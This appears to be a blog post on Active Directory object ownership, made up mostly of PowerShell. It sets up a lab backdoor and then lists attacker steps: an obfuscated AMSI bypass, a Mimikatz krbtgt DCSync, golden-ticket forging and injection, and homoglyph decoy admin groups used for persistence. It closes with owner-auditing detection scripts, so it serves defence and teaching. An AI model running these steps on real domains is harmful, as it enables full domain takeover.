Do You Know Who Owns Your Domain?

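#Lab setup for the ownership demo. Run as a Domain Admin in a throw-away lab domain only.
#  1. GroupX  - explicit DENY of ExtendedRight (all-zero GUID = every extended right) on the domain head
#  2. GroupY  - ALLOW GenericAll on the domain head
#  3. "Insider" user, member of both groups
#  4. remove the DENY again so GroupY's GenericAll takes full effect for Insider
#Explicit Deny ACEs are ordered ahead of Allow ACEs in a canonical DACL, so while the GroupX entry
#exists it masks the extended rights that GenericAll would otherwise give Insider.
Import-Module ActiveDirectory
Set-Location AD:

$DomainDN   = 'dc=corp,dc=local'
$DomainPath = "AD:\$DomainDN"
$UserOU     = "ou=user accounts,$DomainDN"
#All-zero object-type / inherited-object-type GUID: the ACE is not scoped to one property, property set
#or extended right (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm). Written as
#[Guid]::Empty so a copy/paste cannot turn the hyphens into dashes and break the [GUID] cast.
$AnyObjectType = [Guid]::Empty

#Build one ACE for the domain head. Constructor order is
#(identity, rights, Allow|Deny, objectType GUID, inheritance, inheritedObjectType GUID).
function New-DomainHeadAce {
    param(
        [Parameter(Mandatory)] [System.Security.Principal.SecurityIdentifier] $Sid,
        [Parameter(Mandatory)] [System.DirectoryServices.ActiveDirectoryRights] $Rights,
        [Parameter(Mandatory)] [System.Security.AccessControl.AccessControlType] $Type
    )
    New-Object System.DirectoryServices.ActiveDirectoryAccessRule ($Sid, $Rights, $Type, $AnyObjectType, 'None', $AnyObjectType)
}

New-ADGroup -Name 'GroupX' -SamAccountName 'GroupX' -DisplayName 'GroupX' -GroupScope Global -GroupCategory Security -Path $UserOU
New-ADGroup -Name 'GroupY' -SamAccountName 'GroupY' -DisplayName 'GroupY' -GroupScope Global -GroupCategory Security -Path $UserOU

#Create the user BEFORE adding it to groups (Add-ADGroupMember cannot add an account that does not exist yet).
#-Name is mandatory for New-ADUser. The account is created disabled by default; enable it and set a
#password only if the lab needs an interactive logon as Insider.
New-ADUser -Name 'Insider' -SamAccountName 'Insider' -DisplayName 'Malicious Insider' -UserPrincipalName 'Insider@corp.local' -Path $UserOU
Add-ADGroupMember -Identity 'GroupX' -Members 'Insider'
Add-ADGroupMember -Identity 'GroupY' -Members 'Insider'

#Get-ADGroup already returns a SecurityIdentifier; no need to re-wrap it in New-Object
$groupXSid = (Get-ADGroup -Identity 'GroupX').SID
$groupYSid = (Get-ADGroup -Identity 'GroupY').SID

#Step 1: DENY every extended right to GroupX on the domain head
$acl = Get-Acl -Path $DomainPath
$acl.AddAccessRule((New-DomainHeadAce -Sid $groupXSid -Rights ExtendedRight -Type Deny))
Set-Acl -Path $DomainPath -AclObject $acl

#Step 2: ALLOW GenericAll to GroupY on the domain head
$acl = Get-Acl -Path $DomainPath
$acl.AddAccessRule((New-DomainHeadAce -Sid $groupYSid -Rights GenericAll -Type Allow))
Set-Acl -Path $DomainPath -AclObject $acl

#Step 4: take the DENY away again so Insider's GenericAll is no longer masked.
#RemoveAccessRule matches on identity/rights/type/GUIDs, so the rule is rebuilt exactly as added.
$acl = Get-Acl -Path $DomainPath
if (-not $acl.RemoveAccessRule((New-DomainHeadAce -Sid $groupXSid -Rights ExtendedRight -Type Deny))) {
    Write-Warning "No matching DENY ExtendedRight ACE for GroupX was found on $DomainDN"
}
Set-Acl -Path $DomainPath -AclObject $acl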
#AMSI Bypass, dump krbtgt, forge a ticket
#Lab-only attacker steps, kept here so the detection sections further down can be read against them.
#Obfuscated one-liner: the concatenated fragments spell System.Management.Automation.AmsiUtils,
#amsiInitFailed and "NonPublic,Static"; it uses reflection to set that static field to $true, after
#which this PowerShell session no longer submits script content to AMSI for scanning.
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
#Loads Invoke-Mimikatz from C:\Temp (the script must already be on disk there)
Import-Module C:\Temp\Invoke-Mimikatz.ps1
#DCSync the krbtgt secret. This needs the directory-replication extended rights on the domain head;
#presumably it works at this point because the GroupX DENY was removed and GroupY's GenericAll covers them.
Invoke-Mimikatz -Command ‘“lsadump::dcsync /user:corp\krbtgt”’
#Forge a golden ticket for Administrator. The domain SID and krbtgt hash are specific to the author's lab.
#The ticket is written to golden.kirbi in the current directory - remove it when the lab is torn down.
Invoke-Mimikatz -Command ‘“kerberos::golden /User:Administrator /domain:corp.local /sid:S-1–5–21–1917967189–4054103991–136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 id:500 /ticket:golden.kirbi”’
#Inject the forged ticket into the current logon session (pass-the-ticket)
Invoke-Mimikatz -Command ‘“kerberos::ptt golden.kirbi”’
#Decoy container and group whose names use non-ASCII look-alike characters ("𝖡uiltin", "ꓮdministrators"),
#so in most tools they read like CN=Builtin / CN=Administrators. Only the DisplayName is plain ASCII.
New-ADObject -Name “𝖡uiltin” -Type “Container” -Path “dc=corp,dc=local”
New-ADGroup -Name “ꓮdministrators” -DisplayName “Administrators” -Path “cn=𝖡uiltin,dc=corp,dc=local” -SamAccountName “ꓮdministrators” -GroupScope Global
#Make the Insider user the owner of the decoy group...
$acl = Get-Acl “AD:\CN=ꓮdministrators,CN=𝖡uiltin,DC=corp,DC=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser -Identity “Insider”).SID
$acl.SetOwner($user)
Set-ACL “AD:\CN=ꓮdministrators,CN=𝖡uiltin,DC=corp,DC=local” $acl
#...and the decoy group the owner of the domain head. The resulting chain
#(domain head -> decoy group -> Insider) is what the owner checks later in this post are meant to surface:
#by design an object's owner can rewrite its DACL, so this survives removal of the GroupX/GroupY ACEs.
$acl = Get-Acl “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “ꓮdministrators”).SID
$acl.SetOwner($user)
Set-ACL “AD:\dc=corp,dc=local” $acl
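#Put the original DENY on GroupX back on the domain head (restores the "masked" lab state).
#Every other step in this post targets corp.local; the original snippet pointed at dc=test,dc=local,
#which would either fail or touch a different domain.
$DomainPath = 'AD:\dc=corp,dc=local'
$acl = Get-Acl -Path $DomainPath
$groupXSid = (Get-ADGroup -Identity 'GroupX').SID
#Deny ExtendedRight with all-zero GUIDs = every extended right, not just one
#(http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm). [Guid]::Empty avoids the
#dash-vs-hyphen copy/paste problem with a literal "00000000-0000-...".
$denyRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule ($groupXSid, 'ExtendedRight', 'Deny', [Guid]::Empty, 'None', [Guid]::Empty)
$acl.AddAccessRule($denyRule)
#Apply above ACL rules
Set-Acl -Path $DomainPath -AclObject $acl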
Get-ADGroupMember -Identity (Get-ADGroup -Filter {adminCount -eq 1} -Properties *).Name -Recursive
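#Record "who owns it" for the objects an attacker would take ownership of: the domain head,
#AdminSDHolder and every protected group (adminCount=1). Rows are appended to C:\Temp\PostResults.csv
#with the same four columns as before (Thing, Owner's Name, Owner's DN, Owner's SID).
#Differences from the original snippets: the owner may be a USER or an unresolvable SID, not only a
#group (Get-ADGroup on a user owner used to fail silently and leave the row blank - which is exactly
#what an attacker who takes ownership with a user account would leave behind), and errors are no
#longer hidden with a global $ErrorActionPreference.
Import-Module ActiveDirectory
Set-Location AD:

$ResultsCsv = 'C:\Temp\PostResults.csv'

#One result row for the owner of the object at $DistinguishedName; $Thing is the label for the "Thing" column.
function Get-AdOwnerRow {
    param(
        [Parameter(Mandatory)] [string] $DistinguishedName,
        [Parameter(Mandatory)] [string] $Thing
    )
    $acl = Get-Acl -Path "AD:\$DistinguishedName" -ErrorAction SilentlyContinue
    if ($null -eq $acl) {
        Write-Warning "Could not read the security descriptor of $DistinguishedName"
        return [pscustomobject]@{ 'Thing' = $Thing; "Owner's Name" = ''; "Owner's DN" = ''; "Owner's SID" = '' }
    }
    #Get-Acl reports the owner as "DOMAIN\account", or as a raw "S-1-5-..." string if the SID cannot be translated
    $ownerText = [string]$acl.Owner
    if ($ownerText -match '^S-1-') {
        $ownerSidObj = [System.Security.Principal.SecurityIdentifier]$ownerText
        $owner = Get-ADObject -Filter { objectSid -eq $ownerSidObj } -Properties objectSid
    } else {
        $accountName = $ownerText.Split('\')[-1]
        #Get-ADObject, not Get-ADGroup: the owner may be a user account
        $owner = Get-ADObject -Filter { sAMAccountName -eq $accountName } -Properties objectSid
    }
    if ($null -eq $owner) {
        #Cross-domain, deleted or otherwise unresolvable owner: keep the raw text rather than dropping it
        Write-Warning "Owner '$ownerText' of $DistinguishedName could not be resolved in this domain"
        $ownerName = $ownerText
        $ownerDn   = ''
        $ownerSid  = $ownerText
    } else {
        $ownerName = $owner.Name
        $ownerDn   = $owner.DistinguishedName
        $ownerSid  = $owner.objectSid.Value
    }
    [pscustomobject]@{
        'Thing'        = $Thing
        "Owner's Name" = $ownerName
        "Owner's DN"   = $ownerDn
        "Owner's SID"  = $ownerSid
    }
}

$rows = New-Object System.Collections.Generic.List[object]

#Only the current domain is covered. For a multi-domain forest add the other domains' DNs here
#(the AD: drive must be able to reach those naming contexts for Get-Acl to work).
$domainDns = @((Get-ADDomain).DistinguishedName)
foreach ($domainDn in $domainDns) {
    #Owner of the domain head itself
    $rows.Add((Get-AdOwnerRow -DistinguishedName $domainDn -Thing $domainDn))
    #AdminSDHolder is the template SDProp applies to protected objects, so its owner is worth checking alongside the domain head
    $rows.Add((Get-AdOwnerRow -DistinguishedName "cn=AdminSDHolder,cn=System,$domainDn" -Thing 'AdminSDHolder'))
}

#Every protected group. Get-ADGroup is fine for the *objects* (they are groups); the owner lookup above must not assume that.
foreach ($group in (Get-ADGroup -Filter { adminCount -eq 1 })) {
    $rows.Add((Get-AdOwnerRow -DistinguishedName $group.DistinguishedName -Thing $group.Name))
}

$rows | Export-Csv -Path $ResultsCsv -Append -NoTypeInformation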
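#Sweep every object in the domain naming context and print the ones whose owner is not an expected principal.
Import-Module ActiveDirectory
Set-Location AD:

$ADRoot = (Get-ADDomain).DistinguishedName
#Owners that are expected on domain objects. The pattern is anchored on purpose: the original unanchored
#"Domain Admins|..." accepted any owner whose name merely CONTAINED those words (e.g. "CORP\Domain Admins2"),
#and an unresolvable owner (Get-Acl failed -> $null) was printed as bad without an owner. A look-alike
#group such as the non-ASCII "ꓮdministrators" from the lab does not match and is flagged.
#Add Enterprise Admins here if it shows up as a legitimate owner in your forest root.
$SafeOwnerPattern = '^(?:[^\\]+\\Domain Admins|BUILTIN\\Administrators|NT AUTHORITY\\SYSTEM)$'

foreach ($adObject in (Get-ADObject -Filter * -SearchBase $ADRoot -SearchScope Subtree)) {
    $dn = $adObject.DistinguishedName
    #Read the security descriptor once per object (the original called Get-Acl twice)
    $acl = Get-Acl -Path "AD:\$dn" -ErrorAction SilentlyContinue
    if ($null -eq $acl) {
        #Unreadable is a finding of its own, but a different one than "bad owner"
        Write-Warning "Could not read the security descriptor of $dn"
        continue
    }
    #Raw "S-1-5-..." owners (untranslatable SIDs) do not match the pattern and are reported too
    if ($acl.Owner -notmatch $SafeOwnerPattern) {
        Write-Host "Object: $dn" -ForegroundColor Red
        $acl.Owner
    }
}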
Invoke-Command -ScriptBlock {Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\} -ComputerName DC
